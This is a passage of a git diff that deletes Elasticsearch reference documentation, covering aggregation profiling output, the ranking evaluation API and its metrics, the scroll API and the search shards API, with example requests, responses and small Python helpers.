"compute_max_score": 0, - "advance": 3942, - "advance_count": 4, - "score": 0, - "build_scorer_count": 2, - "create_weight": 38380, - "shallow_advance": 0, - "create_weight_count": 1, - "build_scorer": 99296 - } - }, - { - "type": "TermQuery", - "description": "user.id:elkbee", - "time_in_nanos": 163081, - "breakdown": { - "set_min_competitive_score_count": 0, - "match_count": 0, - "shallow_advance_count": 0, - "set_min_competitive_score": 0, - "next_doc": 2447, - "match": 0, - "next_doc_count": 4, - "score_count": 4, - "compute_max_score_count": 0, - "compute_max_score": 0, - "advance": 3552, - "advance_count": 1, - "score": 5027, - "build_scorer_count": 2, - "create_weight": 107840, - "shallow_advance": 0, - "create_weight_count": 1, - "build_scorer": 44215 - } - } - ], - "rewrite_time": 4769, - "collector": [ - { - "name": "MultiCollector", - "reason": "search_multi", - "time_in_nanos": 1945072, - "children": [ - { - "name": "FilteredCollector", - "reason": "search_post_filter", - "time_in_nanos": 500850, - "children": [ - { - "name": "SimpleTopScoreDocCollector", - "reason": "search_top_hits", - "time_in_nanos": 22577 - } - ] - }, - { - "name": "MultiBucketCollector: [[my_scoped_agg, my_global_agg]]", - "reason": "aggregation", - "time_in_nanos": 867617 - } - ] - } - ] - } - ], - "aggregations": [...] <1> - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"aggregations": \[\.\.\.\]/"aggregations": $body.$_path/] -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] -// TESTRESPONSE[s/"id": "\[P6-vulHtQRWuD4YnubWb7A\]\[my-index-000001\]\[0\]"/"id": $body.profile.shards.0.id/] -<1> The `"aggregations"` portion has been omitted because it will be covered in -the next section. - -As you can see, the output is significantly more verbose than before. All the -major portions of the query are represented: - -1. The first `TermQuery` (user.id:elkbee) represents the main `term` query. -2. 
The second `TermQuery` (message:search) represents the `post_filter` query.
-
-The Collector tree is fairly straightforward, showing how a single
-CancellableCollector wraps a MultiCollector, which in turn wraps both a
-FilteredCollector to execute the post_filter (itself wrapping the normal scoring
-SimpleCollector) and a BucketCollector to run all scoped aggregations.
-
-===== Understanding MultiTermQuery output
-
-A special note needs to be made about the `MultiTermQuery` class of queries.
-This includes wildcard, regex, and fuzzy queries. These queries emit very
-verbose responses, and are not overly structured.
-
-Essentially, these queries rewrite themselves on a per-segment basis. If you
-imagine the wildcard query `b*`, it technically can match any token that begins
-with the letter "b". It would be impossible to enumerate all possible
-combinations, so Lucene rewrites the query in the context of the segment being
-evaluated, e.g., one segment may contain the tokens `[bar, baz]`, so the query
-rewrites to a BooleanQuery combination of "bar" and "baz". Another segment may
-only have the token `[bakery]`, so the query rewrites to a single TermQuery for
-"bakery".
-
-Due to this dynamic, per-segment rewriting, the clean tree structure becomes
-distorted and no longer follows a clean "lineage" showing how one query rewrites
-into the next. At present, all we can do is apologize, and suggest you
-collapse the details for that query's children if it is too confusing. Luckily,
-all the timing statistics are correct, just not the physical layout in the
-response, so it is sufficient to just analyze the top-level MultiTermQuery and
-ignore its children if you find the details too tricky to interpret.
-
-Hopefully this will be fixed in future iterations, but it is a tricky problem to
-solve and still in progress. :)
-
-[[profiling-aggregations]]
-===== Profiling Aggregations
-
-
-[[agg-section]]
-====== `aggregations` Section
-
-
-The `aggregations` section contains detailed timing of the aggregation tree
-executed by a particular shard. The overall structure of this aggregation tree
-will resemble your original {es} request.
Let's execute the previous query again -and look at the aggregation profile this time: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "profile": true, - "query": { - "term": { - "user.id": { - "value": "elkbee" - } - } - }, - "aggs": { - "my_scoped_agg": { - "terms": { - "field": "http.response.status_code" - } - }, - "my_global_agg": { - "global": {}, - "aggs": { - "my_level_agg": { - "terms": { - "field": "http.response.status_code" - } - } - } - } - }, - "post_filter": { - "match": { - "message": "search" - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=profile.shards.aggregations/] -// TEST[continued] - - -This yields the following aggregation profile output: - -[source,console-result] --------------------------------------------------- -{ - "profile": { - "shards": [ - { - "aggregations": [ - { - "type": "NumericTermsAggregator", - "description": "my_scoped_agg", - "time_in_nanos": 79294, - "breakdown": { - "reduce": 0, - "build_aggregation": 30885, - "build_aggregation_count": 1, - "initialize": 2623, - "initialize_count": 1, - "reduce_count": 0, - "collect": 45786, - "collect_count": 4, - "build_leaf_collector": 18211, - "build_leaf_collector_count": 1, - "post_collection": 929, - "post_collection_count": 1 - }, - "debug": { - "total_buckets": 1, - "result_strategy": "long_terms" - } - }, - { - "type": "GlobalAggregator", - "description": "my_global_agg", - "time_in_nanos": 104325, - "breakdown": { - "reduce": 0, - "build_aggregation": 22470, - "build_aggregation_count": 1, - "initialize": 12454, - "initialize_count": 1, - "reduce_count": 0, - "collect": 69401, - "collect_count": 4, - "build_leaf_collector": 8150, - "build_leaf_collector_count": 1, - "post_collection": 1584, - "post_collection_count": 1 - }, - "children": [ - { - "type": "NumericTermsAggregator", - "description": "my_level_agg", - "time_in_nanos": 76876, - "breakdown": { - "reduce": 0, - "build_aggregation": 13824, - "build_aggregation_count": 1, - "initialize": 1441, - "initialize_count": 1, - "reduce_count": 0, - "collect": 61611, - "collect_count": 4, - "build_leaf_collector": 5564, - "build_leaf_collector_count": 1, - "post_collection": 471, - "post_collection_count": 1 - }, - "debug": { - "total_buckets": 1, - "result_strategy": "long_terms" - } - } - ] - } - ] - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] -// TESTRESPONSE[s/"id": "\[P6-vulHtQRWuD4YnubWb7A\]\[my-index-000001\]\[0\]"/"id": $body.profile.shards.0.id/] - -From the profile structure we can see that the `my_scoped_agg` is internally -being run as a `NumericTermsAggregator` (because the field it is aggregating, -`http.response.status_code`, is a numeric field). At the same level, we see a `GlobalAggregator` -which comes from `my_global_agg`. That aggregation then has a child -`NumericTermsAggregator` which comes from the second term's aggregation on `http.response.status_code`. - -The `time_in_nanos` field shows the time executed by each aggregation, and is -inclusive of all children. While the overall time is useful, the `breakdown` -field will give detailed stats about how the time was spent. - -Some aggregations may return expert `debug` information that describe features -of the underlying execution of the aggregation that are 'useful for folks that -hack on aggregations but that we don't expect to be otherwise useful. 
They can
-vary wildly between versions, aggregations, and aggregation execution
-strategies.
-
-===== Timing Breakdown
-
-The `breakdown` component lists detailed statistics about low-level execution:
-
-[source,js]
---------------------------------------------------
-"breakdown": {
-  "reduce": 0,
-  "build_aggregation": 30885,
-  "build_aggregation_count": 1,
-  "initialize": 2623,
-  "initialize_count": 1,
-  "reduce_count": 0,
-  "collect": 45786,
-  "collect_count": 4,
-  "build_leaf_collector": 18211,
-  "build_leaf_collector_count": 1,
-  "post_collection": 929,
-  "post_collection_count": 1
-}
---------------------------------------------------
-// NOTCONSOLE
-
-Each property in the `breakdown` component corresponds to an internal method for
-the aggregation. For example, the `build_leaf_collector` property measures
-nanoseconds spent running the aggregation's `getLeafCollector()` method.
-Properties ending in `_count` record the number of invocations of the particular
-method. For example, `"collect_count": 2` means the aggregation called
-`collect()` on two different documents. The `reduce` property is reserved for
-future use and always returns `0`.
-
-Timings are listed in wall-clock nanoseconds and are not normalized at all. All
-caveats about the overall `time` apply here. The intention of the breakdown is
-to give you a feel for A) what machinery in {es} is actually eating time, and B)
-the magnitude of differences in times between the various components. Like the
-overall time, the breakdown is inclusive of all children times.
-
-[[profiling-considerations]]
-===== Profiling Considerations
-
-Like any profiler, the Profile API introduces a non-negligible overhead to
-search execution. The act of instrumenting low-level method calls such as
-`collect`, `advance`, and `next_doc` can be fairly expensive, since these
-methods are called in tight loops. Therefore, profiling should not be enabled
-in production settings by default, and should not be compared against
-non-profiled query times. Profiling is just a diagnostic tool.
-
-There are also cases where special Lucene optimizations are disabled, since they
-are not amenable to profiling. This could cause some queries to report larger
-relative times than their non-profiled counterparts, but in general should not
-have a drastic effect compared to other components in the profiled query.
-
-[[profile-limitations]]
-===== Limitations
-
-- Profiling currently does not measure the search fetch phase or the network
-overhead.
-- Profiling also does not account for time spent in the queue, merging shard
-responses on the coordinating node, or additional work such as building global
-ordinals (an internal data structure used to speed up search).
-- Profiling statistics are currently not available for suggestions,
-highlighting, or `dfs_query_then_fetch`.
-- Profiling of the reduce phase of aggregation is currently not available.
-- The Profiler is still highly experimental. The Profiler instruments parts
-of Lucene that were never designed to be exposed in this manner, and so all
-results should be viewed as a best effort to provide detailed diagnostics. We
-hope to improve this over time. If you find obviously wrong numbers, strange
-query structures, or other bugs, please report them!
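-
-Because both `time_in_nanos` and the `breakdown` values are inclusive of
-children, it can be useful to compute each aggregation's "self" time by
-subtracting its children's totals. The helper below is a plain-Python sketch
-over a parsed aggregation profile (dictionaries like the ones shown earlier);
-it is an analysis idea, not part of the API.
-
-[source,python]
---------------------------------------------------
-def print_agg_self_times(aggregations, depth=0):
-    """Print each profiled aggregation's inclusive and self (children-excluded) time."""
-    for agg in aggregations:
-        children = agg.get("children", [])
-        inclusive = agg["time_in_nanos"]
-        self_time = inclusive - sum(child["time_in_nanos"] for child in children)
-        print(
-            f'{"  " * depth}{agg["description"]} ({agg["type"]}): '
-            f'{inclusive / 1_000_000:.3f} ms total, {self_time / 1_000_000:.3f} ms self'
-        )
-        print_agg_self_times(children, depth + 1)
-
-# For a profiled search response parsed into `resp`:
-# print_agg_self_times(resp["profile"]["shards"][0]["aggregations"])
--------------------------------------------------- 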
diff --git a/docs/reference/search/rank-eval.asciidoc b/docs/reference/search/rank-eval.asciidoc
deleted file mode 100644
index 7d750a34e5d..00000000000
--- a/docs/reference/search/rank-eval.asciidoc
+++ /dev/null
@@ -1,535 +0,0 @@
-[[search-rank-eval]]
-=== Ranking evaluation API
-++++
-Ranking evaluation
-++++
-
-Allows you to evaluate the quality of ranked search results over a set of
-typical search queries.
-
-[[search-rank-eval-api-request]]
-==== {api-request-title}
-
-`GET //_rank_eval`
-
-`POST //_rank_eval`
-
-
-[[search-rank-eval-api-desc]]
-==== {api-description-title}
-
-The ranking evaluation API allows you to evaluate the quality of ranked search
-results over a set of typical search queries. Given this set of queries and a
-list of manually rated documents, the `_rank_eval` endpoint calculates and
-returns typical information retrieval metrics like _mean reciprocal rank_,
-_precision_ or _discounted cumulative gain_.
-
-Search quality evaluation starts with looking at the users of your search
-application, and the things that they are searching for. Users have a specific
-_information need_; for example, they are looking for a gift in a web shop or want
-to book a flight for their next holiday. They usually enter some search terms
-into a search box or some other web form. All of this information, together with
-meta information about the user (for example the browser, location, earlier
-preferences and so on), then gets translated into a query to the underlying
-search system.
-
-The challenge for search engineers is to tweak this translation process from
-user entries to a concrete query in such a way that the search results contain
-the most relevant information with respect to the user's information need. This
-can only be done if the search result quality is evaluated constantly across a
-representative test suite of typical user queries, so that improvements in the
-rankings for one particular query don't negatively affect the ranking for
-other types of queries.
-
-In order to get started with search quality evaluation, you need three basic
-things:
-
-. A collection of documents you want to evaluate your query performance against,
-  usually one or more data streams or indices.
-. A collection of typical search requests that users enter into your system.
-. A set of document ratings that represent the documents' relevance with respect
-  to a search request.
-
-It is important to note that one set of document ratings is needed per test
-query, and that the relevance judgements are based on the information need of
-the user that entered the query.
-
-The ranking evaluation API provides a convenient way to use this information in
-a ranking evaluation request to calculate different search evaluation metrics.
-This gives you a first estimation of your overall search quality, as well as a
-measurement to optimize against when fine-tuning various aspects of the query
-generation in your application.
-
-
-[[search-rank-eval-api-path-params]]
-==== {api-path-parms-title}
-
-``::
-(Optional, string)
-Comma-separated list of data streams, indices, and index aliases used to limit
-the request. Wildcard (`*`) expressions are supported.
-+
-To target all data streams and indices in a cluster, omit this parameter or use
-`_all` or `*`.
-
-[[search-rank-eval-api-query-params]]
-==== {api-query-parms-title}
-
-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices]
-+
-Defaults to `true`.
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ --- -Defaults to `open`. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - - -[[search-rank-eval-api-example]] -==== {api-examples-title} - -In its most basic form, a request to the `_rank_eval` endpoint has two sections: - -[source,js] ------------------------------ -GET /my-index-000001/_rank_eval -{ - "requests": [ ... ], <1> - "metric": { <2> - "mean_reciprocal_rank": { ... } <3> - } -} ------------------------------ -// NOTCONSOLE - -<1> a set of typical search requests, together with their provided ratings -<2> definition of the evaluation metric to calculate -<3> a specific metric and its parameters - -The request section contains several search requests typical to your -application, along with the document ratings for each particular search request. - -[source,js] ------------------------------ -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "amsterdam_query", <1> - "request": { <2> - "query": { "match": { "text": "amsterdam" } } - }, - "ratings": [ <3> - { "_index": "my-index-000001", "_id": "doc1", "rating": 0 }, - { "_index": "my-index-000001", "_id": "doc2", "rating": 3 }, - { "_index": "my-index-000001", "_id": "doc3", "rating": 1 } - ] - }, - { - "id": "berlin_query", - "request": { - "query": { "match": { "text": "berlin" } } - }, - "ratings": [ - { "_index": "my-index-000001", "_id": "doc1", "rating": 1 } - ] - } - ] -} ------------------------------ -// NOTCONSOLE - -<1> The search request's ID, used to group result details later. -<2> The query being evaluated. -<3> A list of document ratings. Each entry contains the following arguments: -- `_index`: The document's index. For data streams, this should be the - document's backing index. -- `_id`: The document ID. -- `rating`: The document's relevance with regard to this search request. - -A document `rating` can be any integer value that expresses the relevance of the -document on a user-defined scale. For some of the metrics, just giving a binary -rating (for example `0` for irrelevant and `1` for relevant) will be sufficient, -while other metrics can use a more fine-grained scale. - - -===== Template-based ranking evaluation - -As an alternative to having to provide a single query per test request, it is -possible to specify query templates in the evaluation request and later refer to -them. This way, queries with a similar structure that differ only in their -parameters don't have to be repeated all the time in the `requests` section. -In typical search systems, where user inputs usually get filled into a small -set of query templates, this helps make the evaluation request more succinct. - -[source,js] --------------------------------- -GET /my-index-000001/_rank_eval -{ - [...] - "templates": [ - { - "id": "match_one_field_query", <1> - "template": { <2> - "inline": { - "query": { - "match": { "{{field}}": { "query": "{{query_string}}" }} - } - } - } - } - ], - "requests": [ - { - "id": "amsterdam_query" - "ratings": [ ... ], - "template_id": "match_one_field_query", <3> - "params": { <4> - "query_string": "amsterdam", - "field": "text" - } - }, - [...] -} --------------------------------- -// NOTCONSOLE - -<1> the template id -<2> the template definition to use -<3> a reference to a previously defined template -<4> the parameters to use to fill the template - -It is also possible to use <> in the cluster state by referencing their id in the templates section. 
- -[source,js] --------------------------------- -GET /my_index/_rank_eval -{ - [...] - "templates": [ - { - "id": "match_one_field_query", <1> - "template": { <2> - "id": "match_one_field_query" - } - } - ], - "requests": [...] -} --------------------------------- -// NOTCONSOLE - -<1> the template id used for requests -<2> the template id stored in the cluster state - -===== Available evaluation metrics - -The `metric` section determines which of the available evaluation metrics -will be used. The following metrics are supported: - -[discrete] -[[k-precision]] -===== Precision at K (P@k) - -This metric measures the proportion of relevant results in the top k search results. -It's a form of the well-known -{wikipedia}/Evaluation_measures_(information_retrieval)#Precision[Precision] -metric that only looks at the top k documents. It is the fraction of relevant -documents in those first k results. A precision at 10 (P@10) value of 0.6 then -means 6 out of the 10 top hits are relevant with respect to the user's -information need. - -P@k works well as a simple evaluation metric that has the benefit of being easy -to understand and explain. Documents in the collection need to be rated as either -relevant or irrelevant with respect to the current query. P@k is a set-based -metric and does not take into account the position of the relevant documents -within the top k results, so a ranking of ten results that contains one -relevant result in position 10 is equally as good as a ranking of ten results -that contains one relevant result in position 1. - -[source,console] --------------------------------- -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "JFK query", - "request": { "query": { "match_all": {} } }, - "ratings": [] - } ], - "metric": { - "precision": { - "k": 20, - "relevant_rating_threshold": 1, - "ignore_unlabeled": false - } - } -} --------------------------------- -// TEST[setup:my_index] - -The `precision` metric takes the following optional parameters - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -|`k` |sets the maximum number of documents retrieved per query. This value will act in place of the usual `size` parameter -in the query. Defaults to 10. -|`relevant_rating_threshold` |sets the rating threshold above which documents are considered to be -"relevant". Defaults to `1`. -|`ignore_unlabeled` |controls how unlabeled documents in the search results are counted. -If set to 'true', unlabeled documents are ignored and neither count as relevant or irrelevant. Set to 'false' (the default), they are treated as irrelevant. -|======================================================================= - - -[discrete] -[[k-recall]] -===== Recall at K (R@k) - -This metric measures the total number of relevant results in the top k search -results. It's a form of the well-known -{wikipedia}/Evaluation_measures_(information_retrieval)#Recall[Recall] -metric. It is the fraction of relevant documents in those first k results -relative to all possible relevant results. A recall at 10 (R@10) value of 0.5 then -means 4 out of 8 relevant documents, with respect to the user's information -need, were retrieved in the 10 top hits. - -R@k works well as a simple evaluation metric that has the benefit of being easy -to understand and explain. Documents in the collection need to be rated as either -relevant or irrelevant with respect to the current query. 
R@k is a set-based -metric and does not take into account the position of the relevant documents -within the top k results, so a ranking of ten results that contains one -relevant result in position 10 is equally as good as a ranking of ten results -that contains one relevant result in position 1. - -[source,console] --------------------------------- -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "JFK query", - "request": { "query": { "match_all": {} } }, - "ratings": [] - } ], - "metric": { - "recall": { - "k": 20, - "relevant_rating_threshold": 1 - } - } -} --------------------------------- -// TEST[setup:my_index] - -The `recall` metric takes the following optional parameters - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -|`k` |sets the maximum number of documents retrieved per query. This value will act in place of the usual `size` parameter -in the query. Defaults to 10. -|`relevant_rating_threshold` |sets the rating threshold above which documents are considered to be -"relevant". Defaults to `1`. -|======================================================================= - - -[discrete] -===== Mean reciprocal rank - -For every query in the test suite, this metric calculates the reciprocal of the -rank of the first relevant document. For example, finding the first relevant -result in position 3 means the reciprocal rank is 1/3. The reciprocal rank for -each query is averaged across all queries in the test suite to give the -{wikipedia}/Mean_reciprocal_rank[mean reciprocal rank]. - -[source,console] --------------------------------- -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "JFK query", - "request": { "query": { "match_all": {} } }, - "ratings": [] - } ], - "metric": { - "mean_reciprocal_rank": { - "k": 20, - "relevant_rating_threshold": 1 - } - } -} --------------------------------- -// TEST[setup:my_index] - -The `mean_reciprocal_rank` metric takes the following optional parameters - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -|`k` |sets the maximum number of documents retrieved per query. This value will act in place of the usual `size` parameter -in the query. Defaults to 10. -|`relevant_rating_threshold` |Sets the rating threshold above which documents are considered to be -"relevant". Defaults to `1`. -|======================================================================= - - -[discrete] -===== Discounted cumulative gain (DCG) - -In contrast to the two metrics above, -{wikipedia}/Discounted_cumulative_gain[discounted cumulative gain] -takes both the rank and the rating of the search results into account. - -The assumption is that highly relevant documents are more useful for the user -when appearing at the top of the result list. Therefore, the DCG formula reduces -the contribution that high ratings for documents on lower search ranks have on -the overall DCG metric. 
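-
-To make the discounting concrete, here is a small, self-contained sketch of the
-calculation in Python. It uses the common exponential-gain form of DCG; treat it
-as an illustration of the idea rather than a statement of the exact formula the
-metric implements.
-
-[source,python]
---------------------------------------------------
-import math
-
-def dcg(ratings):
-    """DCG for a list of relevance ratings given in ranked order (best hit first)."""
-    return sum(
-        (2 ** rating - 1) / math.log2(position + 1)
-        for position, rating in enumerate(ratings, start=1)
-    )
-
-def ndcg(ratings):
-    """Normalized DCG: observed DCG divided by the DCG of an ideal ordering."""
-    ideal = dcg(sorted(ratings, reverse=True))
-    return dcg(ratings) / ideal if ideal > 0 else 0.0
-
-# A highly rated document near the top contributes far more than the same
-# document further down the ranking.
-print(dcg([3, 2, 3, 0, 1, 2]))   # ratings of the top hits, in ranked order
-print(ndcg([3, 2, 3, 0, 1, 2]))
--------------------------------------------------- 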
- -[source,console] --------------------------------- -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "JFK query", - "request": { "query": { "match_all": {} } }, - "ratings": [] - } ], - "metric": { - "dcg": { - "k": 20, - "normalize": false - } - } -} --------------------------------- -// TEST[setup:my_index] - -The `dcg` metric takes the following optional parameters: - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -|`k` |sets the maximum number of documents retrieved per query. This value will act in place of the usual `size` parameter -in the query. Defaults to 10. -|`normalize` | If set to `true`, this metric will calculate the {wikipedia}/Discounted_cumulative_gain#Normalized_DCG[Normalized DCG]. -|======================================================================= - - -[discrete] -===== Expected Reciprocal Rank (ERR) - -Expected Reciprocal Rank (ERR) is an extension of the classical reciprocal rank -for the graded relevance case (Olivier Chapelle, Donald Metzler, Ya Zhang, and -Pierre Grinspan. 2009. -https://olivier.chapelle.cc/pub/err.pdf[Expected reciprocal rank for graded relevance].) - -It is based on the assumption of a cascade model of search, in which a user -scans through ranked search results in order and stops at the first document -that satisfies the information need. For this reason, it is a good metric for -question answering and navigation queries, but less so for survey-oriented -information needs where the user is interested in finding many relevant -documents in the top k results. - -The metric models the expectation of the reciprocal of the position at which a -user stops reading through the result list. This means that a relevant document -in a top ranking position will have a large contribution to the overall score. -However, the same document will contribute much less to the score if it appears -in a lower rank; even more so if there are some relevant (but maybe less relevant) -documents preceding it. In this way, the ERR metric discounts documents that -are shown after very relevant documents. This introduces a notion of dependency -in the ordering of relevant documents that e.g. Precision or DCG don't account -for. - -[source,console] --------------------------------- -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "JFK query", - "request": { "query": { "match_all": {} } }, - "ratings": [] - } ], - "metric": { - "expected_reciprocal_rank": { - "maximum_relevance": 3, - "k": 20 - } - } -} --------------------------------- -// TEST[setup:my_index] - -The `expected_reciprocal_rank` metric takes the following parameters: - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -| `maximum_relevance` | Mandatory parameter. The highest relevance grade used in the user-supplied -relevance judgments. -|`k` | sets the maximum number of documents retrieved per query. This value will act in place of the usual `size` parameter -in the query. Defaults to 10. -|======================================================================= - - -===== Response format - -The response of the `_rank_eval` endpoint contains the overall calculated result -for the defined quality metric, a `details` section with a breakdown of results -for each query in the test suite and an optional `failures` section that shows -potential errors of individual queries. 
The response has the following format: - -[source,js] --------------------------------- -{ - "rank_eval": { - "metric_score": 0.4, <1> - "details": { - "my_query_id1": { <2> - "metric_score": 0.6, <3> - "unrated_docs": [ <4> - { - "_index": "my-index-000001", - "_id": "1960795" - }, ... - ], - "hits": [ - { - "hit": { <5> - "_index": "my-index-000001", - "_type": "page", - "_id": "1528558", - "_score": 7.0556192 - }, - "rating": 1 - }, ... - ], - "metric_details": { <6> - "precision": { - "relevant_docs_retrieved": 6, - "docs_retrieved": 10 - } - } - }, - "my_query_id2": { [... ] } - }, - "failures": { [... ] } - } -} --------------------------------- -// NOTCONSOLE - -<1> the overall evaluation quality calculated by the defined metric -<2> the `details` section contains one entry for every query in the original `requests` section, keyed by the search request id -<3> the `metric_score` in the `details` section shows the contribution of this query to the global quality metric score -<4> the `unrated_docs` section contains an `_index` and `_id` entry for each document in the search result for this -query that didn't have a ratings value. This can be used to ask the user to supply ratings for these documents -<5> the `hits` section shows a grouping of the search results with their supplied ratings -<6> the `metric_details` give additional information about the calculated quality metric (e.g. how many of the retrieved -documents were relevant). The content varies for each metric but allows for better interpretation of the results diff --git a/docs/reference/search/scroll-api.asciidoc b/docs/reference/search/scroll-api.asciidoc deleted file mode 100644 index 98627abf905..00000000000 --- a/docs/reference/search/scroll-api.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[scroll-api]] -=== Scroll API -++++ -Scroll -++++ - -IMPORTANT: We no longer recommend using the scroll API for deep pagination. If -you need to preserve the index state while paging through more than 10,000 hits, -use the <> parameter with a point in time (PIT). - -Retrieves the next batch of results for a <>. - -//// -[source,console] --------------------------------------------------- -GET /_search?scroll=1m -{ - "size": 1, - "query": { - "match_all": {} - } -} --------------------------------------------------- -// TEST[setup:my_index] -//// - -[source,console] --------------------------------------------------- -GET /_search/scroll -{ - "scroll_id" : "DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==" -} --------------------------------------------------- -// TEST[continued] -// TEST[s/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==/$body._scroll_id/] - -[[scroll-api-request]] -==== {api-request-title} - -`GET /_search/scroll/` -deprecated:[7.0.0] - -`GET /_search/scroll` - -`POST /_search/scroll/` -deprecated:[7.0.0] - -`POST /_search/scroll` - -[[scroll-api-desc]] -==== {api-description-title} - -You can use the scroll API to retrieve large sets of results from a single -<> request. - -The scroll API requires a scroll ID. To get a scroll ID, submit a -<> request that includes an argument for the -<>. The `scroll` -parameter indicates how long {es} should retain the -<> for the request. - -The search response returns a scroll ID in the `_scroll_id` response body -parameter. You can then use the scroll ID with the scroll API to retrieve the -next batch of results for the request. 
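-
-In practice this becomes a loop: issue the initial search with the `scroll`
-query parameter, then keep calling the scroll API with the most recently
-returned `_scroll_id` until a page comes back empty, and finally free the search
-context with the clear scroll API. A minimal sketch with the Python `requests`
-package, assuming an unsecured cluster at `http://localhost:9200`:
-
-[source,python]
---------------------------------------------------
-import requests
-
-ES = "http://localhost:9200"  # assumption: local, unsecured cluster
-
-# The initial search opens the search context and returns the first batch.
-page = requests.post(
-    f"{ES}/my-index-000001/_search",
-    params={"scroll": "1m"},
-    json={"size": 1000, "query": {"match_all": {}}},
-).json()
-
-while page["hits"]["hits"]:
-    for hit in page["hits"]["hits"]:
-        pass  # process each document here
-    # Fetch the next batch, extending the search context by another minute.
-    page = requests.post(
-        f"{ES}/_search/scroll",
-        json={"scroll": "1m", "scroll_id": page["_scroll_id"]},
-    ).json()
-
-# Free the search context once the scroll is exhausted.
-requests.delete(f"{ES}/_search/scroll", json={"scroll_id": page["_scroll_id"]})
--------------------------------------------------- 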
- -You can also use the scroll API to specify a new `scroll` parameter that extends -or shortens the retention period for the search context. - -See <>. - -IMPORTANT: Results from a scrolling search reflect the state of the index at the -time of the initial search request. Subsequent indexing or document changes only -affect later search and scroll requests. - -[[scroll-api-path-params]] -==== {api-path-parms-title} - -``:: -deprecated:[7.0.0] -(Optional, string) -Scroll ID of the search. -+ -IMPORTANT: Scroll IDs can be long. We recommend only specifying scroll IDs using -the <>. - -[[scroll-api-query-params]] -==== {api-query-parms-title} - -`scroll`:: -(Optional, <>) -Period to retain the <> for scrolling. See -<>. -+ -This value overrides the duration set by the original search API request's -`scroll` parameter. -+ -By default, this value cannot exceed `1d` (24 hours). You can change -this limit using the `search.max_keep_alive` cluster-level setting. -+ -IMPORTANT: You can also specify this value using the `scroll` request body -parameter. If both parameters are specified, only the query parameter is used. - -`scroll_id`:: -deprecated:[7.0.0] -(Optional, string) -Scroll ID for the search. -+ -IMPORTANT: Scroll IDs can be long. We recommend only specifying scroll IDs using -the <>. - -`rest_total_hits_as_int`:: -(Optional, Boolean) -If `true`, the API response's `hit.total` property is returned as an integer. -If `false`, the API response's `hit.total` property is returned as an object. -Defaults to `false`. - -[role="child_attributes"] -[[scroll-api-request-body]] -==== {api-request-body-title} - -`scroll`:: -(Optional, <>) -Period to retain the <> for scrolling. See -<>. -+ -This value overrides the duration set by the original search API request's -`scroll` parameter. -+ -By default, this value cannot exceed `1d` (24 hours). You can change -this limit using the `search.max_keep_alive` cluster-level setting. -+ -IMPORTANT: You can also specify this value using the `scroll` query -parameter. If both parameters are specified, only the query parameter is used. - -[[scroll-api-scroll-id-param]] -`scroll_id`:: -(Required, string) -Scroll ID for the search. - -[role="child_attributes"] -[[scroll-api-response-body]] -==== {api-response-body-title} - -The scroll API returns the same response body as the search API. See the search -API's <>. diff --git a/docs/reference/search/search-shards.asciidoc b/docs/reference/search/search-shards.asciidoc deleted file mode 100644 index f44e129c0de..00000000000 --- a/docs/reference/search/search-shards.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[search-shards]] -=== Search Shards API - -Returns the indices and shards that a search request would be executed against. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search_shards --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards":5}}\n/] - - -[[search-shards-api-request]] -==== {api-request-title} - -`GET //_search_shards` - - -[[search-shards-api-desc]] -==== {api-description-title} - -The search shards api returns the indices and shards that a search request would -be executed against. This can give useful feedback for working out issues or -planning optimizations with routing and shard preferences. When filtered aliases -are used, the filter is returned as part of the `indices` section. 
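-
-To turn the response into something quickly scannable, a small script can print
-which node each shard copy would be searched on. The response structure it walks
-is shown in the examples below; the `http://localhost:9200` endpoint and the
-Python `requests` package are assumptions for illustration.
-
-[source,python]
---------------------------------------------------
-import requests
-
-ES = "http://localhost:9200"  # assumption: local, unsecured cluster
-
-resp = requests.get(f"{ES}/my-index-000001/_search_shards").json()
-
-# "shards" is a list of shard groups; each group holds the copies of one shard.
-for group in resp["shards"]:
-    for copy in group:
-        role = "primary" if copy["primary"] else "replica"
-        print(f'{copy["index"]} shard {copy["shard"]} ({role}) on node {copy["node"]}')
--------------------------------------------------- 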
